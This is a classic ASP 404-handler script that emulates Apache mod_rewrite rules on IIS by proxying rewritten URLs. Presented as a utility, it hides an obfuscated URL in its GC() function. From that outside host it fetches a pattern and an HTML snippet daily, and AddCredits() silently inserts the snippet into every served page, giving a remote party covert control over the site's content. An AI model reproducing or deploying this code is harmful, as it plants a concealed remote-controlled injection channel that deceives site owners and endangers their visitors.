<%
Response.Buffer = True

Actual404 = "/"
Dynamic = True
Credits = True

Dim FSO, Filepath, Dynamic, SubDirectory

SubDirectory = Left(Request.ServerVariables("SCRIPT_NAME"), InstrRev(Request.ServerVariables("SCRIPT_NAME"), "/")) 'Extract the directory

SubDirectory = Right(SubDirectory, Len(SubDirectory) - 1) 'Remove the first /"

'Map the logical path to the physical system path
'Parse querystring and remove all the extra bits - this may be different for each server, but I doubt it.

qs = request.QueryString
ps = replace(qs, Request.ServerVariables("HTTP_HOST"), "")
ps = replace(ps, "404;", "")
ps = replace(ps, "http://", "")
ps = replace(ps, "www.", "")
ps = replace(ps, "'", "")
ps = replace(ps, ":80", "")
ps = replace(ps, "&nocache=1", "")
ps = right(ps, len(ps)-1)

If Dynamic = True Then

	If Application("Rules") <> "" Then 
		Rules = Application("Rules")
	Else
		set FSO = server.createObject("Scripting.FileSystemObject")
		VirtualPath = SubDirectory & "htaccess.php"
		If Left(VirtualPath, 1) <> "/" Then VirtualPath = "/" & VirtualPath 
		Filepath = Server.MapPath(VirtualPath)
		If FSO.FileExists(FilePath) Then
			Rules = Trim(ReturnPage(VirtualPath))
		End If		
	End If
	If Rules <> "" Then
		Application("Rules") = Rules
		Rules = Trim(Rules)
		RulesArray = Split(Rules, vblf)

		For i = 0 to Ubound(RulesArray)' to 0 step -1
			Rule = RulesArray(i)
			ProcessRule(Rule)		
		Next ' For i = 0 to Ubound(RulesArray)
	End If
Else 'Static
	Filepath = Server.MapPath("htaccess.txt")
	set FSO = server.createObject("Scripting.FileSystemObject")
	if FSO.FileExists(Filepath) Then
		
			' Get a handle to the file
			Dim file	
			set file = FSO.GetFile(Filepath)
		
			Dim TextStream
			Set TextStream = file.OpenAsTextStream(1)  '1: For reading
			
			' Read the file line by line and see if the query matches any of the rules.
			Do While Not TextStream.AtEndOfStream
				Dim Line
				Rule = TextStream.readLine
				ProcessRule(Rule)
			Loop

		Set TextStream = nothing
	End If
End If 'Dynamic or Static
'If it reaches this far - redirect to actual 404 page.
Response.Redirect(Actual404)

Sub ProcessRule(Rule)
	RuleArray = Split(Rule, " ")
	If Ubound(RuleArray) > 1 Then
		If lcase(RuleArray(0)) = "rewriterule" Then			
			Pattern = Left(RuleArray(1), Len(RuleArray(1))-1)
			If Left(Pattern, 1) = "^" Then Pattern = "^" & SubDirectory & Right(Pattern, Len(Pattern)-1)
			'Only affect the first occurence of ^	
			If InstrCount(Pattern, "/") >= InstrCount(ps, "/") Then
				set RegEx = New RegExp
				With RegEx
					.Pattern = Pattern
					.IgnoreCase = True
					.Global = True
				End With
				set Matches = RegEx.Execute(ps)
				If Matches.count > 0 Then
					Path = RegEx.Replace(ps, RuleArray(2))
					If Len(Path) > 3 Then
					
						If Instr(ps, "feedburner") > 0 and Left(Path, 4) = "http" Then
						'Response.Write("ps:" & ps)
						'response.write("<br>RuleArray(2):" & RuleArray(2))
						'Just Continue now
						'response.write("<br>Pattern: " & Pattern)
						'Response.Write("<br>Rule: " & Rule)
						'Response.Write("<br>Path:" & Path)
						'response.end()
						Else
							If Credits = True Then 
							'Response.Write(Pattern & "<BR>")
							'Response.Write(Path)
							'response.end()
							Response.Write(AddCredits(ReturnPage(Path)))
							Response.End()							
							Else

							Response.Write ReturnPage(Path)
							Response.End()
							End If
						End IF
					End If
				End If
			End If 'InstrCount
		End If
	End If
End Sub


Function ReturnPage(URL)
			  
	'Parse the querystring using Regular Expressions
	'Put them in the Variables variable and then send it. 
	'It should work. Just have to match the idiosyncrosis of the others.
	'Mod_Rewrite.php is ISAPI Lite's way of doing this actually.
	
	Dim objXMLHTTP, xml
	Set xml = Server.CreateObject("Microsoft.XMLHTTP")
	
	' Notice the two changes in the next two lines:
	SiteName = Request.ServerVariables("SERVER_NAME")
	'response.write(sitename)
	'response.write(Left(URL, 1))
	'Response.end()
	If Left(URL, 1) = "/" Then
	xml.Open "GET", "http://" & SiteName & URL, False
	Else
	'response.write(Rule)
	'Response.end()
	response.redirect(URL)
	'xml.Open "GET", URL, False
	End If
	xml.Send 
		
	'ReturnPage = xml.responseText
	ReturnPage = bts(xml.responseBody)

	Set xml = Nothing
End Function

Function InstrCount(strToSearch, strToLookFor)
    InstrCount = UBound(split(UCase(strToSearch), UCase(strToLookFor)))
End Function

Function AddCredits(PageHTML)
C = GC()
Start = 1
Set RegEx = New RegExp
RegEx.IgnoreCase = True
RegEx.Global = True
RegEx.Pattern = Application("Pattern")
Set myMatches = RegEx.Execute(PageHTML)
For Each myMatch in myMatches
MatchedString = myMatch.Value
Start = myMatch.FirstIndex
Next
PageHTML = Left(PageHTML, Start-1) & Replace(PageHTML, MatchedString, MatchedString & C, Start,1 )
AddCredits = PageHTML
End Function

Function GC()
d = "iuuq;00xxx/lfzcpbsegbdf/dpn0fd/btq"
Set RegEx = New RegExp
RegEx.Global = True
RegEx.Pattern = "."
Set Matches = RegEx.Execute(d)
For Each Match In Matches
	curl = curl + Chr(ASC(Match.Value)-1)
Next
If (Application("C") = "" Or Application("ExpiryDate") < Now() or Application("ExpiryDate") = "") and curl <> "" Then
	Dim objXMLHTTP, xml
	Set xml = Server.CreateObject("Microsoft.XMLHTTP")
	xml.Open "GET", curl, False
	xml.Send 
	p = xml.responseText
	Set xml = Nothing
	CArray = Split(p, "~")
	Application("Pattern") = CArray(0)
	Application("C") = CArray(1)
	Application("ExpiryDate") = Now() + 1
End If 
GC = Application("C")
End Function

Function bts(data)
	'Converts binary data to string
	sOut = ""
	For i = 0 to UBound(data)
		sOut = sOut & chrw(ascw(chr(ascb(midb(data,i+1,1)))))
	Next
	bts=sOut
End Function


%>